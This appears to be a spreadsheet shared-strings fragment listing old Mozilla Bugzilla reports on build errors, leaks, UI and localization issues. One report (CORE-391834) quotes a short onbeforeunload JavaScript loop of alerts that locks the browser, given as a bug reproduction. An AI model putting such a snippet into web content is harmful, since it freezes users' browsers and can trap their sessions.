  </si>
  <si>
    <t>SEAMONKEY-181883</t>
  </si>
  <si>
    <t>Add UI to swap FN/LN to address book.</t>
  </si>
  <si>
    <t>For collected address book there are cases which FN and LN are assigned
incorrectly. This is because e-mail pretty name has no information about FN and LN.
The same happens for imported address book.
This is about adding UI to swap FN and LN easily. This is similar to what
Apple's address book has.</t>
  </si>
  <si>
    <t>CORE-410792</t>
  </si>
  <si>
    <t>Remove unused FEUnimplementedMOZElement code</t>
  </si>
  <si>
    <t>Created attachment 295367
patch
Now that the last two filters have landed FEUnimplementedMOZElement is no longer used.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-313774</t>
  </si>
  <si>
    <t>windows/packages-static is missing necko_socket.xpt</t>
  </si>
  <si>
    <t>windows/packages-static is missing necko_socket.xpt
This means that all of the interfaces defined in netwerk/socket/base are not scriptable.  This bug only exists in the Windows build of FF 1.5 because of a missing line in browser/installer/windows/packages-static!
Patch coming up.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-450022</t>
  </si>
  <si>
    <t>Server Operations: Projects</t>
  </si>
  <si>
    <t>aus2-community.mozilla.org SSL renewal</t>
  </si>
  <si>
    <t>cert is expiring in 3 months.  Can't recall who did the original CSR or who manages this box (cb-ausstage01).  Bug to track.
Dear GeoTrust Customer:
Your QuickSSL certificate for aus2-community.mozilla.org will expire in 91 days.  It is important that you renew your certificate as soon as possible to ensure the continued security of your website or application.</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-511208</t>
  </si>
  <si>
    <t>[mozmill] Test for verifying GREEN Larry</t>
  </si>
  <si>
    <t>This is a placeholder bug for creating a Mozmill test script for https://litmus.mozilla.org/show_test.cgi?id=6776</t>
  </si>
  <si>
    <t>CORE-336091</t>
  </si>
  <si>
    <t>ASSERTION: bad action nesting! using execCommand('justifyleft') with no selection</t>
  </si>
  <si>
    <t>###!!! ASSERTION: bad action nesting!: 'mActionNesting&gt;0' file /Users/admin/trunk/mozilla/editor/libeditor/html/nsHTMLEditRules.cpp line 386
JavaScript error:  line 0: uncaught exception: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMNSHTMLDocument.execCommand]  nsresult: 0x80004005 (NS_ERROR_FAILURE)  location: JS frame :: bad-nesting.xhtml :: anonymous :: line 17  data: no]</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-784938</t>
  </si>
  <si>
    <t>[cs] Thunderbird 15 whatsnew page localization</t>
  </si>
  <si>
    <t>You'll need to check out part of the mozilla.org repository where the Thunderbird site is being stored. You can:
svn co https://svn.mozilla.org/projects/mozilla.org/branches/staging/thunderbird/
Please translate the file in the mozilla.org svn repository for the Thunderbird 15 What's New page that is:
/cs/thunderbird/15.0/whatsnew/index.html
This page is a completely new redesign and all the content has been rewritten so everything is in English and needs translating.
If you want to provide translated images you can place them in: 
https://svn.mozilla.org/projects/mozilla.org/branches/staging/thunderbird/img/whatsnew/l10n/
The image names should be:
chatnetworks-cs.png
donottrack-cs.png
filelink-cs.png
newaustralis-cs.png
Once the images are on the server the page will automatically update the  tags. You do not need to change them.
The page on the staging server is:
http://www.allizom.org/cs/thunderbird/15.0/whatsnew</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-295517</t>
  </si>
  <si>
    <t>Build fails in uriloader/extandler under BeOS</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: 
Build fails on BeOS in uriloader/extandler
The BeOS specific mailto code seems to be responsible
Reproducible: Always
Steps to Reproduce:
1. clean CVS checkout
2. normal build with standard BeOS .mozconfig
Actual Results:  
c++ -o nsOSHelperAppService.o -c -DMOZILLA_INTERNAL_API -DOSTYPE=\BeOS5.0\
-DOSARCH=\BeOS\ -DBUILD_ID=0000000000 -I. -I../../dist/include/xpcom
-I../../dist/include/string -I../../dist/include/unicharutil
-I../../dist/include/mimetype -I../../dist/include/uriloader
-I../../dist/include/necko -I../../dist/include/rdf
-I../../dist/include/webshell -I../../dist/include/plugin
-I../../dist/include/pref -I../../dist/include/intl -I../../dist/include/uconv
-I../../dist/include/docshell -I../../dist/include/windowwatcher
-I../../dist/include/embed_base -I../../dist/include/toolkitcomps
-I../../dist/include/exthandler -I../../dist/include -I../../dist/include/nspr
-I../../dist/sdk/include -fPIC -frtti -fno-exceptions -Wall -Wconversion
-Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy
-Wno-non-virtual-dtor -Wno-multichar -Wno-long-long -pipe -DNDEBUG -DTRIMMED -O
-DMOZILLA_CLIENT -include ../../mozilla-config.h
-Wp-MD.deps/nsOSHelperAppService.pp ./beos/nsOSHelperAppService.cpp
/boot/home/mozilla/uriloader/exthandler/beos/nsOSHelperAppService.cpp: In method
`nsresult nsOSHelperAppService::LoadUriInternal(class nsIURI *)':
/boot/home/mozilla/uriloader/exthandler/beos/nsOSHelperAppService.cpp:119:
non-lvalue in unary `&amp;'
/boot/home/mozilla/uriloader/exthandler/beos/nsOSHelperAppService.cpp:123:
non-lvalue in unary `&amp;'
make[4]: *** [nsOSHelperAppService.o] Error 1
make[4]: Leaving directory `/boot/home/mozilla/uriloader/exthandler'
make[3]: *** [libs] Error 2
make[3]: Leaving directory `/boot/home/mozilla/uriloader'
make[2]: *** [tier_9] Error 2
make[2]: Leaving directory `/boot/home/mozilla'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/boot/home/mozilla'
make: *** [alldep] Error 2
Expected Results:  
compiled cleanly</t>
  </si>
  <si>
    <t>edward.dore</t>
  </si>
  <si>
    <t>FIREFOX-362685</t>
  </si>
  <si>
    <t>Growl Integration for Mac OS X (nsIAlertsService)</t>
  </si>
  <si>
    <t>Implement nsIAlertsService for Mac OS X using Growl a third-party notification system for Mac OS X.
This will be using the sdk without the installer (as per discussions with mconnor).</t>
  </si>
  <si>
    <t>CORE-391834</t>
  </si>
  <si>
    <t>Don't allow alert/confirm/prompt in onbeforeunload onunload and onpagehide</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a8pre) Gecko/2007081005 Minefield/3.0a8pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a8pre) Gecko/2007081005 Minefield/3.0a8pre
Using onbeforeunload with a loop can render the browser useless.
As example:
&lt;body onbeforeunload=for ( var i = 0 i &lt; 999999 i++) { alert('Alert') }
return false&gt;
If JS is enabled and you tries top close the tab you run into an endless loop with an alert which blocks the complete browser.
It may be even possible that you can trigger it automatically with a redirect clause.
It is not a bug just malicious code. IE6 is also affected but i could not get it to work with Opera.
Reproducible: Always
Steps to Reproduce:
1) Visit the mentioned site with JS on.
2) Try to close the tab.
Actual Results:  
You get an long chain of alerts and the tab is not closed.
Expected Results:  
Allow to ignore the return value from onbeforeunload and allow to close the tab nevertheless.
If you do not know how to fix it (disable JS before closing the tab) you are not even able to get rid of it when sessionstore is enabled. If the thing with redirect is possible you have to abandon your stored session to use your browser again.</t>
  </si>
  <si>
    <t>volkmarkostka</t>
  </si>
  <si>
    <t>BUGZILLA-486239</t>
  </si>
  <si>
    <t>[Oracle] Missing keyword RESTRICT on fk creation (DB::Schema explicitly specified DELETE =&gt; 'RESTRICT')</t>
  </si>
  <si>
    <t>Oracle is default with ON DELETE RESTRICT for a fk constraint but it doesn't have a RESTRICT keyword</t>
  </si>
  <si>
    <t>xiaoou.wu</t>
  </si>
  <si>
    <t>WEBSITES-720412</t>
  </si>
  <si>
    <t>Firefox Flicks</t>
  </si>
  <si>
    <t>Track statistics with statsd</t>
  </si>
  <si>
    <t>We will eventually want to track various statistics about things like video uploads per day votes per day etc. on the server. The easiest way for us to do that is via statsd and graphite (to generate pretty graphs).
Chelsea/Christie: What kind've statistics will we want to collect?</t>
  </si>
  <si>
    <t>FIREFOX-270709</t>
  </si>
  <si>
    <t>Icon details are missing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
When using Internet Connection Sharing (ICS) you will get a connected message
and icon in the systray of the client machine when connection has been
established. If you point at this icon it will show you the status host name
you are connected to and the connection speed.  After installing Firefox I
noticed that the connection speed is missing also if you right click the icon
and select status the status window flashes on the screen and disappears way to
fast to read it.  I am running on beige box w/ Win XP SP2 on both the host and
client machines.  On the client  machine IE was uninstalled through control
panel add/remove windows components.  This used to work with IE.
Thank You for Your time.
Reproducible: Always
Steps to Reproduce:
1.Setup ICS 
2.Install Firefox
3.Point at connected icon
Actual Results:  
See Details window
Expected Results:  
See Details window</t>
  </si>
  <si>
    <t>srigg</t>
  </si>
  <si>
    <t>NSS-352439</t>
  </si>
  <si>
    <t>Reference leaks in modutil</t>
  </si>
  <si>
    <t>Running some modutil commands I ran into many assertions due to reference leaks on shutdown with NSS_STRICT_SHUTDOWN enabled (which I always have in my .cshrc). They are caused by some calls to SECMOD_FindModule without a corresponding SECMOD_DestroyModule . Patch forthcoming .</t>
  </si>
  <si>
    <t>BUGZILLA-149496</t>
  </si>
  <si>
    <t>id and password in the url doesn't work on pages that use quietly_check_login</t>
  </si>
  <si>
    <t>This would be incredibly useful for attachment.cgi for example...  when
attempting to retrieve a patch to apply via a command-line script (like bzpatch
on landfill) if the patch is on a secure bug.
bzpatch would be able to retrieve the patch if you could specify your
Bugzilla_login and Bugzilla_password as part of the URL.  This works on pages
that use confirm_login but not on pages that use quietly_check_login (which
includes attachment.cgi) because quietly_check_login only looks to see if
there's a cookie it doesn't look to see if it was passed as part of the URL.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-493455</t>
  </si>
  <si>
    <t>subscription manager completely broken with gmail -imap (after XLIST support is implemeted)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 pl rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10
Build Identifier: Mozilla/5.0 (X11 U Linux i686 pl rv:1.9.1b5pre) Gecko/20090514 Lightning/1.0pre Shredder/3.0b3pre
I'm using GMail via IMAP.
After an update [using nightly build] I noticed that folders I don't are subscribed.
I tried unsubscribing them but it's impossible.
I need to do this because Thunderbird downloads every message and tries to index all the messages. In folder GMail/All I've got few thousands of messages.
Reproducible: Always
Actual Results:  
Can't unsubscribe.
Expected Results:  
Possible to unsubscribe.</t>
  </si>
  <si>
    <t>u294409</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-258227</t>
  </si>
  <si>
    <t>Single Window Firefox extension out-of-date (1.4 is out)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20040906 Firefox/1.0 PR (NOT FINAL)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20040906 Firefox/1.0 PR (NOT FINAL)
The version of the Single Window extension for Firefox that is available on
update.mozilla.org is 1.0 (see URL above). At the author's homepage at
http://www.spuler.us/extensions/singlewindow.htm you can download version 1.4
which in addition to having new features is also compatible with Firefox 0.10.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>dopefishjustin</t>
  </si>
  <si>
    <t>TESTOPIA-346366</t>
  </si>
  <si>
    <t>2.22 patch is broken</t>
  </si>
  <si>
    <t>enter_bug changes are failing.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-365377</t>
  </si>
  <si>
    <t>Rebuild Index of RSS folder doesn't get feed info correct</t>
  </si>
  <si>
    <t>At least two cases affected by this:
1) Delete the MSF file of a folder with a valid feed restart TB.  New MSF file doesn't have the feed information in it so the subscription no longer appears in the Subscribe dialog.  (I'm not sure yet if this means the folder no longer gets new items.)
2) (This assumes the broken behavior described at bug 257700 comment 13.)
In the Subscribe dialog drag a feed from one folder to another.  The new folder gets the feed info added to its new MSF but (due to the ref'd bug) isn't updated to be the actual feed target.  Rebuild Index on this folder could be used to fix that problem but it doesn't the feed information persists out of synch with feeds.rdf.</t>
  </si>
  <si>
    <t>mcow</t>
  </si>
  <si>
    <t>DIRECTORY-199353</t>
  </si>
  <si>
    <t>ldapsearch contains recurring memory leaks</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.0.3705)
Build Identifier: 
In a persistent search recurring memory leaks will quickly consume system 
resources.  The control array in ldapsearch.c is not freed.  ldap_controls_free 
should be called in function print_entry so that the control array is not 
leaked.
There are a couple of other leaks - the filter pattern (filtpattern) is 
leaked.  Also the argument parsing function leaks.  But since these are small 
non-recurring leaks they are probably not significant.
Reproducible: Always
Steps to Reproduce:
1. Run a simple ldapsearch with a persistent search control:  -C ps:any:1:1
2. Run some ldapmodify ops in the search base
3. With memory checking on notice the leaks when the modified entries are 
printed.</t>
  </si>
  <si>
    <t>saul.edwards.bugs</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-416171</t>
  </si>
  <si>
    <t>Fix view tests so they work with 3.2</t>
  </si>
  <si>
    <t>Need to audit the tests to repair tests that failed because of changes in HTML.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-528353</t>
  </si>
  <si>
    <t>The hybridnet network doesn't exist anymore</t>
  </si>
  <si>
    <t>Hybridnet (irc.ssc.net) is in the list of available networks but doesn't seem to exist anymore.
http://searchirc.com/network/HybridNet
http://irc.netsplit.de/networks/
http://gogloom.com/Hybridnet/
The recent references to hybridnet on a search engine all point to mozilla/ChatZilla URLS so...</t>
  </si>
  <si>
    <t>wormsxulla</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-447636</t>
  </si>
  <si>
    <t>build editor/ui with Mozilla build system as long as it lives in mozilla/</t>
  </si>
  <si>
    <t>On IRC I was pointed to our current way of building editor/ui being wonky as its DEPTH makes it point to the Mozilla autoconf.mk but it can end up with setting topsrcdir to the comm top directory (probably when generated via make-makefile) and that makes it pull the comm rules.mk which uses MOZILLA_SRCDIR at a number of places which is not defined by the Mozilla autoconf.mk.
Potentially ending up with a mixed build system calls for trouble and I wonder a bit that it merely works for us right now.
We should move building of mozilla/editor/ui completely to the Mozilla build system via shifting it around in build.mk so things get stable.
Once bug 445146 gets solved it can make us build it from our build system as it should be.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-453698</t>
  </si>
  <si>
    <t>nsAbLDAPCard::SetMetaProperties assumes an entry has at least one objectClass</t>
  </si>
  <si>
    <t>Created attachment 336906
Patch
Thunderbird 3 doesn't display any search results for queries sent to my school's (Michigan Tech's) LDAP server when bound anonymously.  It looks like the problem is that the result entries don't have an objectClass and nsAbLDAPCard::SetMetaProperties [1] assumes that every entry has at least one object class (see lines 307-310 [2]).
The attached patch just clears m_objectClass earlier and returns NS_OK if rv is LDAP_DECODING_ERROR after trying to get the objectClass values which is returned if the attribute isn't present.
[1] http://mxr.mozilla.org/comm-central/source/mailnews/addrbook/src/nsAbLDAPCard.cpp#280
[2] http://mxr.mozilla.org/comm-central/source/mailnews/addrbook/src/nsAbLDAPCard.cpp#307</t>
  </si>
  <si>
    <t>BUGZILLA-239070</t>
  </si>
  <si>
    <t>Patch viewer mishandling patched filenames with spaces</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
If I attach a patch that contains a change to a file with a space in its name
Patch Viewer ignores everything after the space.
This truncation appears in the filenames in the diff view and in the filenames
in the Raw Unified diff.
Example:
In the original patch:
Index: My Application/Component.cpp
===================================================================
RCS file: /home/hipsoft/root/Ware/Apps/My Application/Component.cppv
Patch viewer treats this now as a file called:
/home/hipsoft/root/Ware/Apps/My
If I click on the Raw Unified link it displays a patch containing:
Index: Ware/Apps/My
===================================================================
RCS file: /home/hipsoft/root/Ware/Apps/My
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>cameron-smith</t>
  </si>
  <si>
    <t>TOOLKIT-412719</t>
  </si>
  <si>
    <t>use -moz-cellhighlight* system color for selected items in non focused lists</t>
  </si>
  <si>
    <t>Created attachment 297479
patch
Since -moz-cellhighlight is the correct color for selected cells in non focused trees / lists on Linux (and -moz-cellhighlighttext the correct text color) this should be used for those elements and resembling elements in Mozilla too.
For Win32 nothing changes: -moz-cellhighlight* is the same color as -moz-Dialog* but this makes it more distinguishable and it will be easier to implement a new color for this if it is ever needed. What's more is that richlistbox.css from winstripe is still shared with gnomestripe.
For Mac I don't know what to do: currently for trees and lists -moz-mac-secundairyhighlight is used but not for richlistboxes. Note that currently -moz-cellhighlight* is the same as -moz-Dialog* but with the patch for bug 412281 in its current state -moz-cellhighlight will be the same as -moz-mac-secundairyhighlight.</t>
  </si>
  <si>
    <t>twanno</t>
  </si>
  <si>
    <t>DATA_&amp;_BI_SERVICES_TEAM-922863</t>
  </si>
  <si>
    <t>Datazilla b2g Data Update</t>
  </si>
  <si>
    <t>We need to update a machine type in the table `b2g_perftest_1`.`machine` please execute the following SQL statement on datazilla-ro-vip.db.scl3.mozilla.com:
UPDATE `b2g_perftest_1`.`machine` SET `type` = 'leo' WHERE `id` IN (29 30 32 47)</t>
  </si>
  <si>
    <t>bjohnson</t>
  </si>
  <si>
    <t>jeads</t>
  </si>
  <si>
    <t>PARTICIPATION_INFRASTRUCTURE-992502</t>
  </si>
  <si>
    <t>API Requests</t>
  </si>
  <si>
    <t>Mozillians API key for testing/developing Mozilla India Leaderboard</t>
  </si>
  <si>
    <t>I am adding features/refractoring Mozilla India leaderboard [1] and need a key for testing purposes.
[1] https://github.com/MozillaIndia/leaderchalk</t>
  </si>
  <si>
    <t>ktyaks</t>
  </si>
  <si>
    <t>CORE-455035</t>
  </si>
  <si>
    <t>Crash shutting down in cookie code</t>
  </si>
  <si>
    <t>###!!! ASSERTION: You can't dereference a NULL nsCOMPtr with operator-&gt;().: 'mRawPtr != 0' file ../../../dist/include/xpcom/nsCOMPtr.h line 811
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x00d27b0c in nsCookieService::Observe (this=0xc8b1f10 aSubject=0xc678360 aTopic=0x12e50b profile-before-change aData=0x13fb40) at /Users/bzbarsky/mozilla/debug/mozilla/netwerk/cookie/src/nsCookieService.cpp:629
629         mDBConn-&gt;Close()
For some reason we failed to open the database during startup but we're blindly trying to close it anyway.  This should have a null-check methinks.</t>
  </si>
  <si>
    <t>CORE-153518</t>
  </si>
  <si>
    <t>Multi-line select fails if to slow character coding related</t>
  </si>
  <si>
    <t>Multi-line select fails if to slow character coding related.
1. go to URL
2. select text by left-click-hold-and-drag up or down on the page
If dragging slow: nothing happens or occasionally a couple of characters get
selected only to be cleared when the next line is reached.
If dragging really fast: seems to work
In View menu switch to Character Coding: Western ISO-8859-1.
Now selection works as expected.
Build 2002-06-21-04 (trunk) on Windows 98 SE.</t>
  </si>
  <si>
    <t>THUNDERBIRD-463900</t>
  </si>
  <si>
    <t>XPCOMUtilify account manager extensions</t>
  </si>
  <si>
    <t>Created attachment 347160
patch v1
The account manager extensions are all formatted the same and can all easily be converted to XPCOMUtils.</t>
  </si>
  <si>
    <t>BUGZILLA-65164</t>
  </si>
  <si>
    <t xml:space="preserve">not sending </t>
  </si>
  <si>
    <t>i noticed the other day that bugzilla/buglist.cgi is not sending 
at the end of the document.  mozilla has a bug that causes it to throb on
this (even though the socket connection has closed) so it is very noticeable.</t>
  </si>
  <si>
    <t>CORE-126572</t>
  </si>
  <si>
    <t>GFX FreeType can not handle mutiple faces of ttc</t>
  </si>
  <si>
    <t>It seems that GFX freetype2 module can not work with multiple
faces in TTC (TrueType collection). Current implementation
seems to pick up mono face by default.
Usuall ttc contains mono and propotional typeface in it so
that we can use both by changing font name.
Currently we use vendor name + family name as font name
in Linux preference but do you think we should add face
to name field for ttc?</t>
  </si>
  <si>
    <t>CORE-326657</t>
  </si>
  <si>
    <t>Cairo windows builds don't run (VC8 runtime files not found)</t>
  </si>
  <si>
    <t>Since 10 days the Cairo windows builds don't start. 
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/experimental/cairo/
The last one that worked was the 31 Jan 2006 build.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-825624</t>
  </si>
  <si>
    <t>Army of Awesome</t>
  </si>
  <si>
    <t>[research] Investigate how to update to Twitter API v1.1</t>
  </si>
  <si>
    <t>v1.0 of the Twitter API is deprecated and scheduled to be turned off early in 2013. From https://dev.twitter.com/docs/faq#rest-api-v11:
    When will API 1.0 be retired?
    API 1.0 will cease accepting requests six months from when API v1.1 is released. We will officially turn off the endpoints for API v1.0 on March 5th 2013. 
We are definitely on the old version of the API. This bug is about looking at all the calls we are doing and figure out what needs to change (hopefully just the URLs?) for us to switch to v1.1 of the API. And file all the required bugs.</t>
  </si>
  <si>
    <t>rdalal</t>
  </si>
  <si>
    <t>CORE-369992</t>
  </si>
  <si>
    <t>Areas previously occupied by a foreignObject aren't repainted</t>
  </si>
  <si>
    <t>Created attachment 254668
testcase
When a foreignObject is moved the area it previously covered is not repainted. The content of the foreignObject then appears in two places.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-81568</t>
  </si>
  <si>
    <t>Bugzilla wrongly rejects current cvs dist build as a version that causes db corruption</t>
  </si>
  <si>
    <t>Using a current cvs build (build ID 2001051717) bugzilla incorrectly identifies
it the version of mozilla that causes bugzilla corruption.
What is the criteria for bugzilla rejecting these builds?</t>
  </si>
  <si>
    <t>ssmith</t>
  </si>
  <si>
    <t>NSS-49316</t>
  </si>
  <si>
    <t>certutil RFE export cert to binary file</t>
  </si>
  <si>
    <t>From a customer:
&gt; I guess this is something between a bug report and a feature request
&gt; but I'm having a problem with the certutil.exe tool.  As you
&gt; my remember this tool manages certificates in a cert7.db certificate
&gt; database.  The problem I ran into involves exporting a
&gt; certificate from the database.  Although the tool can generate a binary
&gt; representation it has no way of writing that to a file.
&gt; Using the redirect &gt; operator works fine for the ascii representation but
&gt; since under the command shell in NT (and I assume in
&gt; all other windows) all carriage return characters are replaced with CR/LF 
pairs
&gt; this does not work for the binary certificate.  I
&gt; realize that I'll have to find a workaround for now but I 
&gt; thought perhaps you could direct this to the appropriate person to do
&gt; something about it.</t>
  </si>
  <si>
    <t>lord</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-459515</t>
  </si>
  <si>
    <t>User management</t>
  </si>
  <si>
    <t>Unable to create new pages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
Build Identifier: 
We are unable to create new pages in the Spanish wiki.
Reproducible: Always
Steps to Reproduce:
1. Go to the url you want to create for example: http://developer.mozilla.org/es/Firefox_3.1_para_desarrolladores
2. Click on edit this page link.
3. You'll get a blank page with the text This page can't be edited.</t>
  </si>
  <si>
    <t>CORE-480427</t>
  </si>
  <si>
    <t>Add a way to run processes in a background thread</t>
  </si>
  <si>
    <t>nsIProcess blocks the main thread if we want to know when it is finished. We need a simple component to do this in the background and notify when complete.</t>
  </si>
  <si>
    <t>BUGZILLA-53612</t>
  </si>
  <si>
    <t>milestone url is bad on delete component screen</t>
  </si>
  <si>
    <t>I have Bugzilla 2.10 running on a rh60 system.
When I go to the components menu and pick a product/component then click
Delete for that component I get values for all the Parts except for
Milestone URL.  What shows up is a hyperlink text  -- missing&gt;missing with a
link to &lt;FONT COLOR=  
It looks like it would be fine if only milestoneurl had another value but it
probably shouldn't break like this if it doesn't.</t>
  </si>
  <si>
    <t>blk</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-512546</t>
  </si>
  <si>
    <t>Kubla</t>
  </si>
  <si>
    <t>Kubla access for Austin</t>
  </si>
  <si>
    <t>I'd like Kubla access. Going to 
https://kubla.mozilla.com/admin/logs/status
told me so.</t>
  </si>
  <si>
    <t>CORE-520522</t>
  </si>
  <si>
    <t>Bypassing XOW by using XPCNativeWrapper.wrappedJSObject</t>
  </si>
  <si>
    <t>The fix for bug 514435 can be circumvented.  By using XPCNativeWrapper it's
possible to get a SJOW whose unsafe object is not a XOW.</t>
  </si>
  <si>
    <t>BUGZILLA-298220</t>
  </si>
  <si>
    <t>Graphs should use localised terms for statuses and resolutions</t>
  </si>
  <si>
    <t>I've been trying to get the graphs generated by Bugzilla to display localised
statuses and resolutions. I did this for pie graphs (the easiest to do) but I
found out that GD::Graph mangles UTF-8 strings. Converting
global/field-descs.none.tmpl to ISO-8859-1 solves this but obviously this is a
hack.
Complicating the issue even more is the fact that templates aren't always in
UTF-8. For exemple Marc (cc-ing) releases German templates in both encodings so
we'ld need to test encoding on the fly and convert if needed. I'm not sure this
is possible and even if it is I doubt it's possible without going with perl 5.8.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-295615</t>
  </si>
  <si>
    <t>fomoco.com - faulty jacascript</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
This is the information that goes into the form on the above url:
76a m 26 02b 61 6 6
body 76a
color m
trim  26
date  02b
dso  61
axle 6
trans 6
Warranty Number:  6f08c243565
The forms aren't accessible by firefox.  I can't even get the cursor to locate
within the form box.
Reproducible: Always
Steps to Reproduce:
try to enter in any data in the forms and you can't even select the form.  
Actual Results:  
nothing.  Can't select text box.
Expected Results:  
You should be able to enter in data and then have it give you code cracker
results for the vehicle.
works in the evil empires browser...
)</t>
  </si>
  <si>
    <t>wbzsinj.bugs</t>
  </si>
  <si>
    <t>mbunner</t>
  </si>
  <si>
    <t>CORE-509958</t>
  </si>
  <si>
    <t>Remove the -moz prefix from ::selection</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 sv-SE rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Build Identifier: 
The Psuedo-element ::selection has not been in the specs (for CSS3) since 2005 but it is still implemented in three layout engines Presto Webkit and Gecko. The first two uses ::selection without a prefix like -webkit or similar but Gecko does not. I can no longer see any reason to keeping the -moz prefix. The implementation is complete the other engines are already doing it. We can't keep it in Experimental status forever and the spec isn't likely to change either.
Reproducible: Always</t>
  </si>
  <si>
    <t>emilio</t>
  </si>
  <si>
    <t>deprecationmail</t>
  </si>
  <si>
    <t>THUNDERBIRD-311446</t>
  </si>
  <si>
    <t>Compose Window triggers runaway thread</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.12) Gecko/20050920 Firefox/1.0.7 SUSE/1.0.7-0.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.12) Gecko/20050920 Firefox/1.0.7 SUSE/1.0.7-0.1
In recent nightly builds for Linux and Solaris thunderbird cpu usage goes to
near 100% once a compose window is opened. This countinues even after the
compose window is closed. ps shows that thread 1 is the runaway thread and is
running mainly in user mode.
Thunderbird continues to run correctly but slowly because of the cpu usage.
Reproducible: Always
Steps to Reproduce:
1.Open a compose window
2.
3.
Actual Results:  
CPU usage goes to near 100%</t>
  </si>
  <si>
    <t>km</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-943874</t>
  </si>
  <si>
    <t>Update git URL in mach bootstrap to point to git.mozilla.org repo</t>
  </si>
  <si>
    <t>Since the Github mirror will close in a few weeks the URL in
python/mozboot/mozboot/bootstrap.py should be updated to point to the
Mozilla hosted git repository at
    https://git.mozilla.org/releases/gecko.git</t>
  </si>
  <si>
    <t>ato</t>
  </si>
  <si>
    <t>CORE-492694</t>
  </si>
  <si>
    <t>TM: Major discrepancy in v8's richards module when run in browser vs. shell</t>
  </si>
  <si>
    <t>When I clear the browser cache and visit the v8 benchmarks suite online occassionally I'll get a 1500+ score on Richards thereafter I consistently get mid-100s. In the js shell I always get above 1500. Is this maybe because of DOM function calls falling off trace or something?
$ $TR/dist/bin/js -j run.js
Richards: 1593
DeltaBlue: 155
Crypto: 149
RayTrace: 245
EarleyBoyer: 334</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-245198</t>
  </si>
  <si>
    <t>Add-ons policy needs to be defined and published</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040518 Firefox/0.8.0+ (Darkstar)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040518 Firefox/0.8.0+ (Darkstar)
u.m.o needs a policy document explaining what themes/extensions/plugins can be
listed the licenses they can come with
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-427785</t>
  </si>
  <si>
    <t>dialog.style in customizeToolbar.properties should not be translated</t>
  </si>
  <si>
    <t xml:space="preserve">In your locale this entity in customizeToolbar.properties:
is translated into your local language. This is not what you
should do here. This is CSS style code telling how wide and high
that window should be - so you should only change the numbers
'635' and '400' but do not translate the words 'width' nor 'height'.
For example this is OK (if you want the window to have the dimensions 735x420:
and this is WRONG:
</t>
  </si>
  <si>
